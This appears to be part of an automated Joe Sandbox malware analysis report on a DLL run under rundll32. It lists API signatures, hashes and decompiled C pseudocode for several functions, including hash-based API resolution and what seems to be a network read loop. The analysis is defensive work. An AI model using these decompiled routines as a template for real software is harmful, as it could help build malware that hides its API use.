                  0x1800098c0
                  0x1800098e3
                  0x1800098ed
                  0x1800098f9
                  0x180009902
                  0x180009907
                  0x180009917
                  0x18000991c
                  0x180009928
                  0x180009936
                  0x180009946
                  0x180009956
                  0x180009964
                  0x18000996a
                  0x180009990

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
                  • String ID:
                  • API String ID: 4119546182-0
                  • Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
                  • Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocCreateErrorHeapLastPipememset
                  • String ID: .RK
                  • API String ID: 2695650488-3354657194
                  • Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
                  • Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
                  • String ID:
                  • API String ID: 2518601019-0
                  • Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
                  • Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
                  • String ID:
                  • API String ID: 4260168601-0
                  • Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
                  • Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
                  • String ID: h
                  • API String ID: 1962595928-2439710439
                  • Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
                  • Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandle$ProcessTerminate
                  • String ID:
                  • API String ID: 1541851893-0
                  • Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
                  • Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
                  				intOrPtr _t43;
                  				intOrPtr _t44;
                  				signed int _t45;
                  				long long* _t81;
                  				void* _t82;
                  				void* _t83;
                  				long long* _t84;
                  				void* _t104;
                  				long long _t108;
                  				void* _t111;
                  				void* _t112;
                  				void* _t121;
                  				int _t123;
                  				int _t126;
                  				void* _t129;
                  				CHAR* _t131;
                  
                  				_t81 = __rax;
                  				 *((long long*)(_t111 + 8)) = __rbx;
                  				 *((long long*)(_t111 + 0x18)) = _t108;
                  				 *((long long*)(_t111 + 0x20)) = __rsi;
                  				_t112 = _t111 - 0x1c0;
                  				_t109 =  *0x8000d4a0;
                  				r14d = 0;
                  				 *(_t112 + 0x1f8) = lstrlenA(_t131);
                  				memset(_t129, _t126, _t123);
                  				_t6 = _t104 + 1; // 0x1
                  				_t7 = _t129 + 2; // 0x2
                  				r11d = _t7;
                  				r8d = _t6;
                  				 *__rdx = r11w;
                  				HeapAlloc(_t104, ??);
                  				if (__rax == 0) goto 0x80002287;
                  				memcpy(??, ??, ??);
                  				_t43 =  *((intOrPtr*)(__rax));
                  				if (_t43 == dil) goto 0x80002192;
                  				if (_t43 == 0x3a) goto 0x8000218d;
                  				_t44 =  *((intOrPtr*)(__rax + 1));
                  				if (_t44 != dil) goto 0x8000217d;
                  				if (_t44 != dil) goto 0x80002195;
                  				_t121 = _t104;
                  				if (_t121 == _t104) goto 0x800021d9;
                  				_t8 = _t121 + 1; // 0x1
                  				 *_t121 = dil;
                  				if (_t8 == _t104) goto 0x800021d9;
                  				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
                  				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
                  				asm("ror cx, 0x8");
                  				 *(__rdx + 2) = _t45;
                  				if (_t45 == 0) goto 0x80002279;
                  				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t81 == _t104) goto 0x800021f5;
                  				 *_t81();
                  				goto 0x800021f8;
                  				_t82 = _t104;
                  				if (_t82 != _t104) goto 0x8000224d;
                  				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t82 == _t104) goto 0x8000221e;
                  				 *_t82();
                  				goto 0x80002220;
                  				if (0 != 0) goto 0x80002249;
                  				r14d = 1;
                  				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t82 == _t104) goto 0x80002241;
                  				 *_t82();
                  				goto 0x80002244;
                  				_t83 = _t104;
                  				if (_t83 != _t104) goto 0x8000224d;
                  				goto 0x8000225f;
                  				_t84 =  *((intOrPtr*)(_t83 + 0x18));
                  				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
                  				if (r14d == 0) goto 0x80002279;
                  				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t84 == _t104) goto 0x80002279;
                  				 *_t84();
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}



















                  0x1800020dc
                  0x1800020dc
                  0x1800020e1
                  0x1800020e6
                  0x1800020f4
                  0x1800020fb
                  0x180002112
                  0x180002122
                  0x180002136
                  0x18000213b
                  0x18000213e
                  0x18000213e
                  0x180002142
                  0x18000214a
                  0x180002151
                  0x18000215d
                  0x18000216c
                  0x180002171
                  0x18000217b
                  0x180002180
                  0x180002185
                  0x18000218b
                  0x180002190
                  0x180002192
                  0x180002198
                  0x18000219a
                  0x18000219e
                  0x1800021a4
                  0x1800021b9
                  0x1800021bf
                  0x1800021c7
                  0x1800021cb
                  0x1800021d3
                  0x1800021e4
                  0x1800021ec
                  0x1800021f1
                  0x1800021f3
                  0x1800021f5
                  0x1800021fb
                  0x180002206
                  0x18000220e
                  0x18000221a
                  0x18000221c
                  0x180002222
                  0x18000222a
                  0x180002230
                  0x180002238
                  0x18000223d
                  0x18000223f
                  0x180002241
                  0x180002247
                  0x18000224b
                  0x18000224d
                  0x18000225b
                  0x180002262
                  0x18000226d
                  0x180002275
                  0x180002277
                  0x180002281
                  0x1800022a9

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlenmemcpymemset
                  • String ID: lJu
                  • API String ID: 1735321128-4100297759
                  • Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
                  • Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
                  				signed long long _t88;
                  				long _t111;
                  				void* _t114;
                  				long _t117;
                  				void* _t121;
                  				void* _t122;
                  				long _t130;
                  				void* _t133;
                  
                  				 *((long long*)(_t121 + 0x18)) = __rbx;
                  				_t122 = _t121 - 0x30;
                  				_t88 =  *0x8000d4a0;
                  				r13d = 0;
                  				 *(__rcx + 0x5c) = r13d;
                  				 *(_t122 + 0x68) = r13d;
                  				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
                  				 *(_t122 + 0x60) = 4;
                  				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e56;
                  				 *_t88();
                  				goto 0x80005e59;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e9d;
                  				_t10 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t10;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005ea0;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				 *(_t122 + 0x68) = r13d;
                  				 *(_t122 + 0x60) = r13d;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005eea;
                  				_t19 = _t122 + 0x68; // 0xa
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t19;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t133, _t130, _t111);
                  				if (_t88 == _t133) goto 0x80005fad;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005f43;
                  				_t27 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t27;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005f46;
                  				if (r13d == r13d) goto 0x80005f95;
                  				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
                  				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t114, _t117);
                  				if (_t88 == _t133) goto 0x80005f8e;
                  				r8d =  *(_t122 + 0x60);
                  				r8d = r8d + 1;
                  				wcstombs(??, ??, ??);
                  				 *(__rcx + 0x20) = _t88;
                  				goto 0x80005f9d;
                  				goto 0x80005f9d;
                  				GetLastError();
                  				HeapFree(??, ??, ??);
                  				goto 0x80005fbc;
                  				goto 0x80005fbc;
                  				return GetLastError();
                  			}











                  0x180005df8
                  0x180005e04
                  0x180005e08
                  0x180005e19
                  0x180005e1f
                  0x180005e23
                  0x180005e2b
                  0x180005e31
                  0x180005e42
                  0x180005e4a
                  0x180005e52
                  0x180005e54
                  0x180005e5c
                  0x180005e6b
                  0x180005e73
                  0x180005e75
                  0x180005e7e
                  0x180005e81
                  0x180005e90
                  0x180005e99
                  0x180005e9b
                  0x180005ea3
                  0x180005ea9
                  0x180005eae
                  0x180005ebc
                  0x180005ec4
                  0x180005ec6
                  0x180005ecb
                  0x180005ece
                  0x180005ed1
                  0x180005edf
                  0x180005ee8
                  0x180005eea
                  0x180005ef8
                  0x180005f04
                  0x180005f13
                  0x180005f1b
                  0x180005f1d
                  0x180005f22
                  0x180005f28
                  0x180005f36
                  0x180005f3f
                  0x180005f41
                  0x180005f49
                  0x180005f56
                  0x180005f5a
                  0x180005f5f
                  0x180005f67
                  0x180005f73
                  0x180005f75
                  0x180005f80
                  0x180005f83
                  0x180005f88
                  0x180005f8c
                  0x180005f93
                  0x180005f95
                  0x180005fa5
                  0x180005fab
                  0x180005fb2
                  0x180005fce

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Alloc$ErrorFreeLastwcstombs
                  • String ID:
                  • API String ID: 4133724704-0
                  • Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
                  • Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 18%
                  			E00000001180003FCC(intOrPtr* __rcx) {
                  				void* __rbx;
                  				void* __rbp;
                  				long long* _t84;
                  				long long* _t85;
                  				void* _t87;
                  				intOrPtr* _t106;
                  				void* _t109;
                  
                  				_t84 =  *0x8000d4a0;
                  				_t106 = __rcx;
                  				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
                  				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000400e;
                  				 *_t84();
                  				goto 0x80004010;
                  				if (0 == 0) goto 0x80004151;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
                  				 *0x8000d028();
                  				if (0 != 0) goto 0x80004145;
                  				r8d = 0x1000;
                  				HeapAlloc(??, ??, ??);
                  				if (_t84 == 0) goto 0x80004133;
                  				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000408d;
                  				r8d = 0x1000;
                  				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
                  				 *_t84();
                  				goto 0x8000408f;
                  				if (0 == 0) goto 0x800040b7;
                  				r8d =  *(_t109 + 0x58);
                  				r9d = 0;
                  				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
                  				 *((intOrPtr*)(_t85 + 0x20))();
                  				r11d =  *(_t109 + 0x58);
                  				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
                  				if (0 == 0) goto 0x800040bf;
                  				goto 0x80004059;
                  				GetLastError();
                  				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
                  				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t85 == 0) goto 0x800040ef;
                  				 *_t85();
                  				goto 0x800040f1;
                  				if (0 == 0) goto 0x80004101;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
                  				goto 0x80004059;
                  				GetLastError();
                  				goto 0x80004110;
                  				HeapFree(??, ??, ??);
                  				if (0x102 != 0) goto 0x80004138;
                  				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
                  				goto 0x80004138;
                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
                  				goto 0x80004166;
                  				goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
                  				goto 0x80004166;
                  				if (GetLastError() != 0x2efe) goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
                  				return 0;
                  			}










                  0x180003fda
                  0x180003fe1
                  0x180003fef
                  0x180003ff7
                  0x180003fff
                  0x18000400a
                  0x18000400c
                  0x180004012
                  0x18000401c
                  0x18000402e
                  0x180004036
                  0x18000403e
                  0x180004047
                  0x180004053
                  0x180004062
                  0x18000406a
                  0x180004070
                  0x180004083
                  0x180004089
                  0x18000408b
                  0x180004091
                  0x180004098
                  0x18000409d
                  0x1800040a0
                  0x1800040a6
                  0x1800040a9
                  0x1800040ae
                  0x1800040b3
                  0x1800040b5
                  0x1800040b7
                  0x1800040cd
                  0x1800040d8
                  0x1800040e0
                  0x1800040eb
                  0x1800040ed
                  0x1800040f3
                  0x1800040fa
                  0x1800040fc
                  0x180004101
                  0x180004109
                  0x180004118
                  0x180004120
                  0x18000412a
                  0x180004131
                  0x180004140
                  0x180004143
                  0x18000414a
                  0x18000414c
                  0x18000414f
                  0x18000415e
                  0x180004160
                  0x180004172

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
                  • String ID:
                  • API String ID: 2540544816-0
                  • Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
                  • Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
                  				void* _t46;
                  				long _t52;
                  				void* _t54;
                  				signed long long _t67;
                  				long long _t69;
                  				signed long long* _t73;
                  				signed long long _t80;
                  				signed long long _t87;
                  				intOrPtr _t90;
                  				struct _FILETIME* _t91;
                  				void* _t98;
                  				void* _t103;
                  				signed long long _t104;
                  				signed long long* _t105;
                  
                  				_t103 = _t98;
                  				 *((long long*)(_t103 + 0x10)) = __rbx;
                  				 *((long long*)(_t103 + 0x18)) = __rsi;
                  				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
                  				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
                  				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
                  				_t73 = _a8;
                  				if (_t73 == 0) goto 0x8000925e;
                  				_t87 = _t73 + 0x18;
                  				 *(_t73 + 0x20) = _t87;
                  				_a8[3] = _t87;
                  				_a8[2] = __rcx;
                  				_a8[1] = __rdx;
                  				 *_a8 =  *_a8 | 0xffffffff;
                  				if (_t46 != 0) goto 0x80009327;
                  				GetSystemTimeAsFileTime(_t91);
                  				EnterCriticalSection(??);
                  				_t104 = __rcx + 0x88;
                  				_t80 =  *(_t104 + 8);
                  				_a8[3] = _t104;
                  				_a8[4] = _t80;
                  				 *_t80 =  &(_a8[3]);
                  				_t67 =  &(_a8[3]);
                  				 *(_t104 + 8) = _t67;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0x1");
                  				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
                  				_a8[6] = _t67;
                  				if (_a8[6] != 0) goto 0x80009331;
                  				_t52 = GetLastError();
                  				EnterCriticalSection(??);
                  				_t105 = _a8;
                  				_t69 =  *((intOrPtr*)(_t105 + 0x20));
                  				_t90 =  *((intOrPtr*)(_t105 + 0x18));
                  				 *_t69 = _t90;
                  				 *((long long*)(_t90 + 8)) = _t69;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0xffffffff");
                  				if (_t52 == 0) goto 0x80009331;
                  				if (_a8 == 0) goto 0x80009331;
                  				E00000001180002770(_t54, _a8);
                  				return _t52;
                  			}

















                  0x1800091f8
                  0x1800091fb
                  0x1800091ff
                  0x180009208
                  0x180009214
                  0x18000921b
                  0x180009221
                  0x18000922b
                  0x18000922d
                  0x180009231
                  0x18000923a
                  0x180009243
                  0x18000924c
                  0x180009255
                  0x180009260
                  0x18000926a
                  0x180009274
                  0x18000927f
                  0x180009286
                  0x18000928a
                  0x180009293
                  0x1800092a0
                  0x1800092ac
                  0x1800092b0
                  0x1800092b4
                  0x1800092ba
                  0x1800092cf
                  0x1800092d9
                  0x1800092e7
                  0x1800092f3
                  0x1800092f5
                  0x1800092fb
                  0x180009300
                  0x180009304
                  0x18000930c
                  0x18000930f
                  0x180009313
                  0x180009319
                  0x180009320
                  0x18000932a
                  0x18000932c
                  0x180009342

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
                  • String ID:
                  • API String ID: 3478816279-0
                  • Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
                  • Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ByteCharErrorHeapLastMultiWide$AllocFree
                  • String ID:
                  • API String ID: 2267670476-0
                  • Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
